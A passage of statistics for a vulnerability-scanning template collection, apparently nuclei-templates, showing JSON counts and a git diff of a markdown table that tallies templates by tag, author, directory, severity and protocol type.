volution","count":1},{"name":"maccmsv10","count":1},{"name":"opencast","count":1},{"name":"sast","count":1},{"name":"graylog","count":1},{"name":"ssl","count":1},{"name":"skycaiji","count":1},{"name":"jsp","count":1},{"name":"locations","count":1},{"name":"sprintful","count":1},{"name":"duomicms","count":1},{"name":"minimouse","count":1},{"name":"cocoon","count":1},{"name":"tapestry","count":1},{"name":"instagram","count":1},{"name":"iterable","count":1},{"name":"cofax","count":1},{"name":"saltapi","count":1},{"name":"buttercms","count":1},{"name":"glances","count":1},{"name":"nownodes","count":1},{"name":"rabbitmq","count":1},{"name":"servicenow","count":1},{"name":"wmt","count":1},{"name":"webmin","count":1},{"name":"beanshell","count":1},{"name":"zm","count":1},{"name":"whm","count":1},{"name":"shopware","count":1},{"name":"pmb","count":1},{"name":"acme","count":1},{"name":"ambari","count":1},{"name":"ecshop","count":1},{"name":"dvr","count":1},{"name":"sentry","count":1},{"name":"faraday","count":1},{"name":"calendly","count":1},{"name":"logontracer","count":1},{"name":"fiori","count":1},{"name":"moinmoin","count":1},{"name":"travis","count":1},{"name":"mediumish","count":1},{"name":"processmaker","count":1},{"name":"owa","count":1},{"name":"expressjs","count":1},{"name":"rijksmuseum","count":1},{"name":"openx","count":1},{"name":"elasticsearch","count":1},{"name":"sterling","count":1},{"name":"st","count":1},{"name":"razor","count":1},{"name":"geutebruck","count":1},{"name":"stytch","count":1},{"name":"maxsite","count":1},{"name":"metinfo","count":1},{"name":"dotclear","count":1},{"name":"krweb","count":1},{"name":"clockwatch","count":1},{"name":"ganglia","count":1},{"name":"catfishcms","count":1},{"name":"scs","count":1},{"name":"alertmanager","count":1},{"name":"seowon","count":1},{"name":"phpfastcache","count":1},{"name":"mysql","count":1},{"name":"ems","count":1},{"name":"landray","count":1},{"name":"lutron","count":1},{"name":"wavlink","count":1},{"name":"gespage","count":1},{"name":"74cms","count":1},{"name":"vercel","count":1},{"name":"phalcon","count":1},{"name":"testrail","count":1},{"name":"thinkadmin","count":1},{"name":"appweb","count":1},{"name":"szhe","count":1},{"name":"luftguitar","count":1},{"name":"setup","count":1},{"name":"phpwiki","count":1},{"name":"glowroot","count":1},{"name":"sco","count":1},{"name":"xiuno","count":1},{"name":"esmtp","count":1},{"name":"bible","count":1},{"name":"pihole","count":1},{"name":"sarg","count":1},{"name":"covalent","count":1},{"name":"yaws","count":1},{"name":"varnish","count":1},{"name":"asus","count":1},{"name":"basic-auth","count":1},{"name":"securityspy","count":1},{"name":"digitalocean","count":1},{"name":"cooperhewitt","count":1},{"name":"selea","count":1},{"name":"redcap","count":1},{"name":"vsphere","count":1},{"name":"tenda","count":1},{"name":"mrtg","count":1},{"name":"seacms","count":1},{"name":"k8s","count":1},{"name":"octoprint","count":1},{"name":"adfs","count":1},{"name":"metabase","count":1},{"name":"playable","count":1},{"name":"wildfly","count":1},{"name":"gotmls","count":1},{"name":"h3c-imc","count":1},{"name":"jnoj","count":1},{"name":"couchbase","count":1},{"name":"realteo","count":1},{"name":"nsasg","count":1},{"name":"vnc","count":1},{"name":"tcexam","count":1},{"name":"vanguard","count":1},{"name":"jquery","count":1},{"name":"asana","count":1},{"name":"abuseipdb","count":1},{"name":"imap","count":1},{"name":"clink-office","count":1},{"name":"dotnetnuke","count":1},{"name":"aniapi","count":1},{"name":"xmpp","count":1},{"name":"sophos","count":1},{"name":"jenzabar","count":1},{"name":"fontawesome","count":1},{"name":"kyan","count":1},{"name":"gridx","count":1},{"name":"mkdocs","count":1},{"name":"remkon","count":1},{"name":"fortigate","count":1},{"name":"planon","count":1},{"name":"pagespeed","count":1},{"name":"livezilla","count":1},{"name":"anchorcms","count":1},{"name":"wazuh","count":1},{"name":"diris","count":1},{"name":"natemail","count":1},{"name":"spip","count":1},{"name":"synnefo","count":1},{"name":"rdp","count":1},{"name":"perl","count":1},{"name":"dbt","count":1},{"name":"stripe","count":1},{"name":"kubeflow","count":1},{"name":"trilithic","count":1},{"name":"webctrl","count":1},{"name":"billquick","count":1},{"name":"oscommerce","count":1},{"name":"vsftpd","count":1},{"name":"alibaba","count":1},{"name":"skywalking","count":1},{"name":"clave","count":1},{"name":"labtech","count":1},{"name":"memcached","count":1},{"name":"jabber","count":1},{"name":"qvisdvr","count":1},{"name":"xampp","count":1},{"name":"listserv","count":1},{"name":"myanimelist","count":1},{"name":"ricoh","count":1},{"name":"flink","count":1},{"name":"yealink","count":1},{"name":"hortonworks","count":1},{"name":"gloo","count":1},{"name":"webftp","count":1},{"name":"mara","count":1},{"name":"xml","count":1},{"name":"timeclock","count":1},{"name":"rsyncd","count":1},{"name":"opensmtpd","count":1},{"name":"placeos","count":1},{"name":"mapbox","count":1},{"name":"proftpd","count":1},{"name":"contentkeeper","count":1},{"name":"biometrics","count":1},{"name":"bolt","count":1},{"name":"virustotal","count":1},{"name":"mantis","count":1},{"name":"shopxo","count":1},{"name":"dahua","count":1},{"name":"fcm","count":1},{"name":"youtube","count":1},{"name":"flexbe","count":1},{"name":"phpfusion","count":1},{"name":"commscope","count":1},{"name":"nearby","count":1},{"name":"gsoap","count":1},{"name":"thedogapi","count":1},{"name":"speed","count":1},{"name":"cerebro","count":1},{"name":"episerver","count":1},{"name":"jitsi","count":1},{"name":"redwood","count":1},{"name":"cyberoam","count":1},{"name":"cvnd","count":1},{"name":"sqlite","count":1},{"name":"tinypng","count":1},{"name":"viewlinc","count":1},{"name":"smartblog","count":1},{"name":"tugboat","count":1},{"name":"k8","count":1},{"name":"argocd","count":1},{"name":"tileserver","count":1},{"name":"websphere","count":1},{"name":"opensns","count":1},{"name":"loqate","count":1},{"name":"erp-nc","count":1},{"name":"shoppable","count":1},{"name":"bookstack","count":1},{"name":"strava","count":1},{"name":"circle","count":1},{"name":"wiki","count":1},{"name":"javamelody","count":1},{"name":"linksys","count":1},{"name":"mariadb","count":1},{"name":"dvwa","count":1},{"name":"sar2html","count":1},{"name":"bedita","count":1},{"name":"aspnuke","count":1},{"name":"nps","count":1},{"name":"mod-proxy","count":1},{"name":"azkaban","count":1},{"name":"announcekit","count":1},{"name":"lg-nas","count":1},{"name":"finereport","count":1},{"name":"cliniccases","count":1},{"name":"gitea","count":1},{"name":"accuweather","count":1},{"name":"route","count":1},{"name":"pendo","count":1},{"name":"svnserve","count":1},{"name":"node-red-dashboard","count":1},{"name":"blue-ocean","count":1},{"name":"adiscon","count":1},{"name":"apigee","count":1},{"name":"pulsesecure","count":1},{"name":"webui","count":1},{"name":"webadmin","count":1},{"name":"iucn","count":1},{"name":"argussurveillance","count":1},{"name":"svn","count":1},{"name":"tor","count":1},{"name":"expose","count":1},{"name":"zms","count":1},{"name":"cve2006","count":1},{"name":"dom","count":1},{"name":"books","count":1},{"name":"dreamweaver","count":1},{"name":"pagerduty","count":1},{"name":"zend","count":1},{"name":"chevereto","count":1},{"name":"addpac","count":1},{"name":"xmlchart","count":1},{"name":"nc2","count":1},{"name":"spectracom","count":1},{"name":"piluscart","count":1},{"name":"stem","count":1},{"name":"bing","count":1},{"name":"gogs","count":1},{"name":"cgi","count":1},{"name":"moin","count":1},{"name":"smi","count":1},{"name":"openstack","count":1},{"name":"fortiweb","count":1},{"name":"tieline","count":1},{"name":"weather","count":1},{"name":"fuelcms","count":1},{"name":"geddy","count":1},{"name":"opm","count":1},{"name":"ns","count":1},{"name":"nimble","count":1},{"name":"phpinfo","count":1},{"name":"circontrol","count":1},{"name":"okiko","count":1},{"name":"monitorr","count":1},{"name":"qdpm","count":1},{"name":"cves2001","count":1},{"name":"xvr","count":1},{"name":"etouch","count":1},{"name":"miscrsoft","count":1},{"name":"csrf","count":1},{"name":"mirai","count":1},{"name":"chinaunicom","count":1},{"name":"myucms","count":1}],"authors":[{"name":"dhiyaneshdk","count":320},{"name":"daffainfo","count":313},{"name":"pikpikcu","count":281},{"name":"pdteam","count":211},{"name":"geeknik","count":172},{"name":"dwisiswant0","count":152},{"name":"gy741","count":86},{"name":"pussycat0x","count":83},{"name":"princechaddha","count":68},{"name":"0x_akoko","count":66},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"gaurang","count":42},{"name":"philippedelteil","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"r3dg33k","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"melbadry9","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"wdahlenb","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":10},{"name":"iamthefrogy","count":8},{"name":"emadshanab","count":8},{"name":"meme-lord","count":8},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"dogasantos","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"divya_mudgal","count":7},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"iamnoooob","count":6},{"name":"puzzlepeaches","count":6},{"name":"rootxharsh","count":6},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"logicalhunter","count":6},{"name":"johnk3r","count":6},{"name":"__fazal","count":6},{"name":"panch0r3d","count":5},{"name":"lu4nx","count":5},{"name":"adam crosser","count":5},{"name":"ganofins","count":5},{"name":"joanbono","count":5},{"name":"elsfa7110","count":5},{"name":"yanyun","count":5},{"name":"xelkomy","count":5},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"_0xf4n9x_","count":4},{"name":"e_schultze_","count":4},{"name":"leovalcante","count":4},{"name":"tess","count":4},{"name":"wisnupramoedya","count":4},{"name":"github.com/its0x08","count":3},{"name":"0w4ys","count":3},{"name":"z3bd","count":3},{"name":"unstabl3","count":3},{"name":"f1tz","count":3},{"name":"idealphase","count":3},{"name":"impramodsargar","count":3},{"name":"vsh00t","count":3},{"name":"jarijaas","count":3},{"name":"sullo","count":3},{"name":"shifacyclewala","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"imnightmaree","count":3},{"name":"skeltavik","count":3},{"name":"thomas_from_offensity","count":3},{"name":"mavericknerd","count":3},{"name":"dudez","count":3},{"name":"me9187","count":3},{"name":"_generic_human_","count":3},{"name":"shine","count":3},{"name":"forgedhallpass","count":3},{"name":"sushantkamble","count":3},{"name":"emenalf","count":3},{"name":"lark-lab","count":3},{"name":"alifathi-h1","count":3},{"name":"binaryfigments","count":3},{"name":"fyoorer","count":3},{"name":"andydoering","count":3},{"name":"johnjhacking","count":3},{"name":"gevakun","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"martincodes-de","count":2},{"name":"moritz nentwig","count":2},{"name":"convisoappsec","count":2},{"name":"udit_thakkur","count":2},{"name":"g4l1t0","count":2},{"name":"r3naissance","count":2},{"name":"random-robbie","count":2},{"name":"swissky","count":2},{"name":"sy3omda","count":2},{"name":"pxmme1337","count":2},{"name":"randomrobbie","count":2},{"name":"cocxanh","count":2},{"name":"manas_harsh","count":2},{"name":"socketz","count":2},{"name":"ehsahil","count":2},{"name":"0xrudra","count":2},{"name":"bernardofsr","count":2},{"name":"alph4byt3","count":2},{"name":"koti2","count":2},{"name":"dahse89","count":2},{"name":"foulenzer","count":2},{"name":"zomsop82","count":2},{"name":"hahwul","count":2},{"name":"ree4pwn","count":2},{"name":"its0x08","count":2},{"name":"0xelkomy","count":2},{"name":"afaq","count":2},{"name":"bp0lr","count":2},{"name":"huowuzhao","count":2},{"name":"fabaff","count":2},{"name":"bing0o","count":2},{"name":"hetroublemakr","count":2},{"name":"dheerajmadhukar","count":2},{"name":"r12w4n","count":2},{"name":"amsda","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"vavkamil","count":2},{"name":"w4cky_","count":2},{"name":"whoever","count":2},{"name":"parth","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xprial","count":2},{"name":"joeldeleep","count":2},{"name":"x1m_martijn","count":2},{"name":"0xsmiley","count":2},{"name":"kiblyn11","count":2},{"name":"arcc","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"gal nagli","count":2},{"name":"lotusdll","count":2},{"name":"nkxxkn","count":2},{"name":"0xcrypto","count":2},{"name":"davidmckennirey","count":2},{"name":"iampritam","count":1},{"name":"ringo","count":1},{"name":"sbani","count":1},{"name":"dawid-czarnecki","count":1},{"name":"ahmed sherif","count":1},{"name":"0xtavian","count":1},{"name":"kurohost","count":1},{"name":"kaizensecurity","count":1},{"name":"0h1in9e","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"izn0u","count":1},{"name":"rojanrijal","count":1},{"name":"0ut0fb4nd","count":1},{"name":"_c0wb0y_","count":1},{"name":"mhdsamx","count":1},{"name":"0xd0ff9","count":1},{"name":"oscarintherocks","count":1},{"name":"bolli95","count":1},{"name":"skylark-lab","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"jeya seelan","count":1},{"name":"_harleo","count":1},{"name":"furkansenan","count":1},{"name":"taielab","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"sshell","count":1},{"name":"nvn1729","count":1},{"name":"lark lab","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"soyelmago","count":1},{"name":"nytr0gen","count":1},{"name":"b0rn2r00t","count":1},{"name":"elmahdi","count":1},{"name":"geraldino2","count":1},{"name":"retr0","count":1},{"name":"0xteles","count":1},{"name":"mah3sec_","count":1},{"name":"noamrathaus","count":1},{"name":"zhenwarx","count":1},{"name":"sickwell","count":1},{"name":"brabbit10","count":1},{"name":"jteles","count":1},{"name":"elouhi","count":1},{"name":"cookiehanhoan","count":1},{"name":"pratik khalane","count":1},{"name":"ooooooo_q","count":1},{"name":"thezakman","count":1},{"name":"regala_","count":1},{"name":"orpheus","count":1},{"name":"andirrahmani1","count":1},{"name":"@dwisiswant0","count":1},{"name":"chron0x","count":1},{"name":"push4d","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"b4uh0lz","count":1},{"name":"mubassirpatel","count":1},{"name":"borna nematzadeh","count":1},{"name":"qlkwej","count":1},{"name":"lethargynavigator","count":1},{"name":"redteambrasil","count":1},{"name":"jrolf","count":1},{"name":"absshax","count":1},{"name":"nerrorsec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ldionmarcil","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"toufik airane","count":1},{"name":"akash.c","count":1},{"name":"luci","count":1},{"name":"blckraven","count":1},{"name":"yashgoti","count":1},{"name":"jiheon-dev","count":1},{"name":"whynotke","count":1},{"name":"xstp","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"andysvints","count":1},{"name":"petruknisme","count":1},{"name":"un-fmunozs","count":1},{"name":"th3.d1p4k","count":1},{"name":"willd96","count":1},{"name":"flag007","count":1},{"name":"yavolo","count":1},{"name":"raesene","count":1},{"name":"fopina","count":1},{"name":"daviey","count":1},{"name":"rodnt","count":1},{"name":"s1r1u5_","count":1},{"name":"j33n1k4","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"micha3lb3n","count":1},{"name":"udyz","count":1},{"name":"apt-mirror","count":1},{"name":"undefl0w","count":1},{"name":"c3l3si4n","count":1},{"name":"alperenkesk","count":1},{"name":"juicypotato1","count":1},{"name":"adrianmf","count":1},{"name":"notsoevilweasel","count":1},{"name":"streetofhackerr007","count":1},{"name":"wabafet","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"omarkurt","count":1},{"name":"shelld3v","count":1},{"name":"fq_hsu","count":1},{"name":"yuansec","count":1},{"name":"hakluke","count":1},{"name":"evolutionsec","count":1},{"name":"pdp","count":1},{"name":"naglinagli","count":1},{"name":"patralos","count":1},{"name":"knassar702","count":1},{"name":"aresx","count":1},{"name":"tim_koopmans","count":1},{"name":"kareemse1im","count":1},{"name":"droberson","count":1},{"name":"mass0ma","count":1},{"name":"akshansh","count":1},{"name":"hanlaomo","count":1},{"name":"majidmc2","count":1},{"name":"manuelbua","count":1},{"name":"tirtha_mandal","count":1},{"name":"shifacyclewla","count":1},{"name":"ipanda","count":1},{"name":"kabirsuda","count":1},{"name":"ahmetpergamum","count":1},{"name":"revblock","count":1},{"name":"@ofjaaah","count":1},{"name":"affix","count":1},{"name":"infosecsanyam","count":1},{"name":"vzamanillo","count":1},{"name":"thevillagehacker","count":1},{"name":"exploitation","count":1},{"name":"52971","count":1},{"name":"igibanez","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"becivells","count":1},{"name":"d0rkerdevil","count":1},{"name":"fmunozs","count":1},{"name":"_darrenmartyn","count":1},{"name":"bad5ect0r","count":1},{"name":"pudsec","count":1},{"name":"shreyapohekar","count":1},{"name":"luskabol","count":1},{"name":"alex","count":1},{"name":"ajaysenr","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"smaranchand","count":1},{"name":"philippdelteil","count":1},{"name":"schniggie","count":1},{"name":"mesaglio","count":1},{"name":"rotemreiss","count":1},{"name":"yashanand155","count":1},{"name":"bjhulst","count":1},{"name":"retr02332","count":1},{"name":"berkdusunur","count":1},{"name":"charanrayudu","count":1},{"name":"gboddin","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"co0nan","count":1},{"name":"ilovebinbash","count":1},{"name":"harshinsecurity","count":1},{"name":"intx0x80","count":1},{"name":"deena","count":1},{"name":"sec_hawk","count":1},{"name":"sicksec","count":1},{"name":"0xh7ml","count":1},{"name":"kre80r","count":1},{"name":"elder tao","count":1},{"name":"thebinitghimire","count":1},{"name":"clarkvoss","count":1},{"name":"0xrod","count":1},{"name":"florianmaak","count":1},{"name":"b0yd","count":1},{"name":"ohlinge","count":1},{"name":"luqman","count":1},{"name":"x6263","count":1},{"name":"makyotox","count":1},{"name":"defr0ggy","count":1},{"name":"husain","count":1},{"name":"zandros0","count":1},{"name":"remonsec","count":1}],"directory":[{"name":"cves","count":874},{"name":"vulnerabilities","count":337},{"name":"exposed-panels","count":299},{"name":"technologies","count":216},{"name":"exposures","count":200},{"name":"misconfiguration","count":152},{"name":"token-spray","count":108},{"name":"takeovers","count":66},{"name":"default-logins","count":62},{"name":"file","count":57},{"name":"workflows","count":43},{"name":"iot","count":36},{"name":"network","count":34},{"name":"miscellaneous","count":22},{"name":"dns","count":12},{"name":"cnvd","count":10},{"name":"fuzzing","count":10},{"name":"headless","count":5}],"severity":[{"name":"info","count":860},{"name":"high","count":672},{"name":"medium","count":499},{"name":"critical","count":310},{"name":"low","count":159}],"types":[{"name":"http","count":2379},{"name":"file","count":57},{"name":"network","count":47},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index efd99c5c08..df3b8cc467 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,999 +1,1019 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 | -| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 | -| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 | -| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 | -| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | | -| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | | -| rce | 222 | gy741 | 85 | token-spray | 102 | | | | | -| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | | -| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | | -| cve2021 | 169 | madrobot | 65 | file | 57 | | | | | -| cve2020 | 167 | zzeitlin | 63 | workflows | 43 | | | | | -| joomla | 128 | 0x_akoko | 62 | iot | 36 | | | | | -| cve2010 | 109 | gaurang | 42 | network | 33 | | | | | -| cve2019 | 102 | philippedelteil | 31 | miscellaneous | 23 | | | | | -| token-spray | 102 | ice3man | 26 | dns | 12 | | | | | +| cve | 869 | dhiyaneshdk | 320 | cves | 874 | info | 860 | http | 2379 | +| lfi | 357 | daffainfo | 313 | vulnerabilities | 337 | high | 672 | file | 57 | +| panel | 303 | pikpikcu | 281 | exposed-panels | 299 | medium | 499 | network | 47 | +| xss | 270 | pdteam | 211 | technologies | 216 | critical | 310 | dns | 12 | +| wordpress | 263 | geeknik | 172 | exposures | 200 | low | 159 | | | +| exposure | 254 | dwisiswant0 | 152 | misconfiguration | 152 | | | | | +| rce | 225 | gy741 | 86 | token-spray | 108 | | | | | +| tech | 212 | pussycat0x | 83 | takeovers | 66 | | | | | +| wp-plugin | 181 | princechaddha | 68 | default-logins | 62 | | | | | +| cve2021 | 170 | 0x_akoko | 66 | file | 57 | | | | | +| cve2020 | 168 | madrobot | 65 | workflows | 43 | | | | | +| joomla | 128 | zzeitlin | 64 | iot | 36 | | | | | +| cve2010 | 109 | gaurang | 42 | network | 34 | | | | | +| token-spray | 108 | philippedelteil | 31 | miscellaneous | 22 | | | | | +| cve2019 | 104 | ice3man | 26 | dns | 12 | | | | | | config | 100 | organiccrap | 24 | cnvd | 10 | | | | | -| cve2018 | 94 | sheikhrishad | 15 | fuzzing | 10 | | | | | -| iot | 81 | pr3r00t | 15 | headless | 5 | | | | | +| cve2018 | 95 | pr3r00t | 15 | fuzzing | 10 | | | | | +| iot | 83 | sheikhrishad | 15 | headless | 5 | | | | | | apache | 76 | milo2012 | 14 | | | | | | | | oast | 75 | techbrunchfr | 13 | | | | | | | | takeover | 70 | suman_kar | 12 | | | | | | | -| default-login | 69 | r3dg33k | 12 | | | | | | | +| default-login | 70 | r3dg33k | 12 | | | | | | | | token | 68 | cyllective | 11 | | | | | | | -| file | 57 | righettod | 10 | | | | | | | -| cve2017 | 53 | random_robbie | 10 | | | | | | | -| unauth | 51 | melbadry9 | 10 | | | | | | | -| network | 44 | hackergautam | 10 | | | | | | | -| ssrf | 44 | nadino | 10 | | | | | | | -| | 43 | wdahlenb | 10 | | | | | | | -| sqli | 42 | aashiq | 8 | | | | | | | -| oracle | 40 | zh | 8 | | | | | | | -| cve2016 | 40 | that_juan_ | 8 | | | | | | | +| file | 57 | wdahlenb | 10 | | | | | | | +| unauth | 55 | nadino | 10 | | | | | | | +| cve2017 | 55 | random_robbie | 10 | | | | | | | +| network | 45 | righettod | 10 | | | | | | | +| sqli | 44 | hackergautam | 10 | | | | | | | +| ssrf | 44 | melbadry9 | 10 | | | | | | | +| | 43 | zh | 8 | | | | | | | +| cve2016 | 40 | aashiq | 8 | | | | | | | +| oracle | 40 | emadshanab | 8 | | | | | | | | redirect | 38 | meme-lord | 8 | | | | | | | | logs | 35 | iamthefrogy | 8 | | | | | | | -| misconfig | 32 | emadshanab | 8 | | | | | | | -| cve2015 | 30 | randomstr1ng | 7 | | | | | | | -| google | 30 | 0x240x23elu | 7 | | | | | | | +| misconfig | 34 | that_juan_ | 8 | | | | | | | +| google | 31 | dr_set | 7 | | | | | | | +| cve2015 | 30 | oppsec | 7 | | | | | | | +| atlassian | 29 | harshbothra_ | 7 | | | | | | | | jira | 29 | dogasantos | 7 | | | | | | | -| atlassian | 29 | oppsec | 7 | | | | | | | -| cisco | 28 | techryptic (@tech) | 7 | | | | | | | -| cve2014 | 27 | harshbothra_ | 7 | | | | | | | -| listing | 27 | kophjager007 | 7 | | | | | | | -| auth-bypass | 27 | dr_set | 7 | | | | | | | -| generic | 24 | __fazal | 6 | | | | | | | -| disclosure | 22 | caspergn | 6 | | | | | | | -| misc | 22 | pentest_swissky | 6 | | | | | | | -| router | 22 | johnk3r | 6 | | | | | | | -| aem | 19 | puzzlepeaches | 6 | | | | | | | -| springboot | 18 | logicalhunter | 6 | | | | | | | -| cve2012 | 18 | divya_mudgal | 6 | | | | | | | -| sap | 18 | ganofins | 5 | | | | | | | -| debug | 18 | lu4nx | 5 | | | | | | | -| weblogic | 16 | joanbono | 5 | | | | | | | -| aws | 15 | panch0r3d | 5 | | | | | | | -| cve2011 | 15 | iamnoooob | 5 | | | | | | | -| wp-theme | 15 | xelkomy | 5 | | | | | | | -| fuzz | 15 | rootxharsh | 5 | | | | | | | -| devops | 15 | elsfa7110 | 5 | | | | | | | -| php | 15 | yanyun | 5 | | | | | | | -| login | 14 | incogbyte | 4 | | | | | | | +| cisco | 29 | techryptic (@tech) | 7 | | | | | | | +| listing | 27 | 0x240x23elu | 7 | | | | | | | +| auth-bypass | 27 | kophjager007 | 7 | | | | | | | +| cve2014 | 27 | randomstr1ng | 7 | | | | | | | +| generic | 24 | divya_mudgal | 7 | | | | | | | +| router | 23 | rootxharsh | 6 | | | | | | | +| disclosure | 22 | pentest_swissky | 6 | | | | | | | +| misc | 21 | __fazal | 6 | | | | | | | +| aem | 19 | logicalhunter | 6 | | | | | | | +| debug | 19 | johnk3r | 6 | | | | | | | +| springboot | 18 | iamnoooob | 6 | | | | | | | +| sap | 18 | caspergn | 6 | | | | | | | +| cve2012 | 18 | puzzlepeaches | 6 | | | | | | | +| weblogic | 16 | panch0r3d | 5 | | | | | | | +| login | 16 | yanyun | 5 | | | | | | | +| php | 16 | xelkomy | 5 | | | | | | | +| cve2011 | 15 | elsfa7110 | 5 | | | | | | | +| aws | 15 | adam crosser | 5 | | | | | | | +| devops | 15 | joanbono | 5 | | | | | | | +| fuzz | 15 | ganofins | 5 | | | | | | | +| wp-theme | 15 | lu4nx | 5 | | | | | | | | cve2009 | 14 | e_schultze_ | 4 | | | | | | | -| struts | 14 | leovalcante | 4 | | | | | | | -| deserialization | 14 | wisnupramoedya | 4 | | | | | | | -| zoho | 13 | tess | 4 | | | | | | | -| adobe | 13 | nodauf | 4 | | | | | | | -| android | 13 | sullo | 3 | | | | | | | -| dlink | 13 | forgedhallpass | 3 | | | | | | | -| dns | 13 | mavericknerd | 3 | | | | | | | -| manageengine | 12 | _0xf4n9x_ | 3 | | | | | | | -| jenkins | 12 | sushantkamble | 3 | | | | | | | -| cve2013 | 11 | z3bd | 3 | | | | | | | -| xxe | 11 | f1tz | 3 | | | | | | | -| intrusive | 11 | emenalf | 3 | | | | | | | -| magento | 11 | alifathi-h1 | 3 | | | | | | | -| hp | 10 | shifacyclewala | 3 | | | | | | | -| dell | 10 | thomas_from_offensity | 3 | | | | | | | -| ftp | 9 | johnjhacking | 3 | | | | | | | -| kubernetes | 9 | idealphase | 3 | | | | | | | -| gitlab | 9 | binaryfigments | 3 | | | | | | | -| rails | 9 | me9187 | 3 | | | | | | | -| vmware | 9 | _generic_human_ | 3 | | | | | | | -| fastjson | 9 | unstabl3 | 3 | | | | | | | -| ibm | 9 | impramodsargar | 3 | | | | | | | -| nginx | 8 | andydoering | 3 | | | | | | | -| ruijie | 8 | shine | 3 | | | | | | | -| microsoft | 8 | jarijaas | 3 | | | | | | | -| cnvd | 8 | dudez | 3 | | | | | | | -| backup | 8 | 0w4ys | 3 | | | | | | | -| airflow | 8 | fyoorer | 3 | | | | | | | -| scada | 8 | skeltavik | 3 | | | | | | | -| cve2008 | 8 | vsh00t | 3 | | | | | | | -| coldfusion | 7 | yash anand @yashanand155 | 3 | | | | | | | -| cms | 7 | github.com/its0x08 | 3 | | | | | | | -| confluence | 7 | parth | 2 | | | | | | | -| fileupload | 7 | g4l1t0 | 2 | | | | | | | -| solr | 7 | 0xsmiley | 2 | | | | | | | -| django | 7 | w4cky_ | 2 | | | | | | | -| netgear | 7 | alph4byt3 | 2 | | | | | | | -| files | 7 | huowuzhao | 2 | | | | | | | -| camera | 7 | lotusdll | 2 | | | | | | | -| prometheus | 6 | martincodes-de | 2 | | | | | | | -| nodejs | 6 | joeldeleep | 2 | | | | | | | -| phpmyadmin | 6 | 0xprial | 2 | | | | | | | -| jetty | 6 | bernardofsr | 2 | | | | | | | -| sitecore | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| rconfig | 6 | 0xcrypto | 2 | | | | | | | -| citrix | 6 | convisoappsec | 2 | | | | | | | -| laravel | 6 | its0x08 | 2 | | | | | | | -| lucee | 6 | ree4pwn | 2 | | | | | | | -| drupal | 6 | nkxxkn | 2 | | | | | | | -| docker | 6 | zomsop82 | 2 | | | | | | | -| api | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| tomcat | 5 | bsysop | 2 | | | | | | | -| crlf | 5 | dheerajmadhukar | 2 | | | | | | | -| jolokia | 5 | sy3omda | 2 | | | | | | | -| thinkphp | 5 | ehsahil | 2 | | | | | | | -| headless | 5 | 0xrudra | 2 | | | | | | | -| printer | 5 | 0xsapra | 2 | | | | | | | -| windows | 5 | whoever | 2 | | | | | | | -| symfony | 5 | arcc | 2 | | | | | | | -| grafana | 5 | amsda | 2 | | | | | | | -| circarlife | 5 | manas_harsh | 2 | | | | | | | -| iis | 5 | udit_thakkur | 2 | | | | | | | -| go | 5 | afaq | 2 | | | | | | | -| java | 5 | fabaff | 2 | | | | | | | -| dedecms | 5 | hahwul | 2 | | | | | | | -| wso2 | 5 | vavkamil | 2 | | | | | | | -| ssti | 5 | hetroublemakr | 2 | | | | | | | -| gocd | 5 | mohammedsaneem | 2 | | | | | | | -| enum | 4 | foulenzer | 2 | | | | | | | -| solarwinds | 4 | pxmme1337 | 2 | | | | | | | -| moodle | 4 | 0xelkomy | 2 | | | | | | | -| fatpipe | 4 | dahse89 | 2 | | | | | | | -| zimbra | 4 | r12w4n | 2 | | | | | | | -| zabbix | 4 | kiblyn11 | 2 | | | | | | | -| artifactory | 4 | koti2 | 2 | | | | | | | -| keycloak | 4 | lark-lab | 2 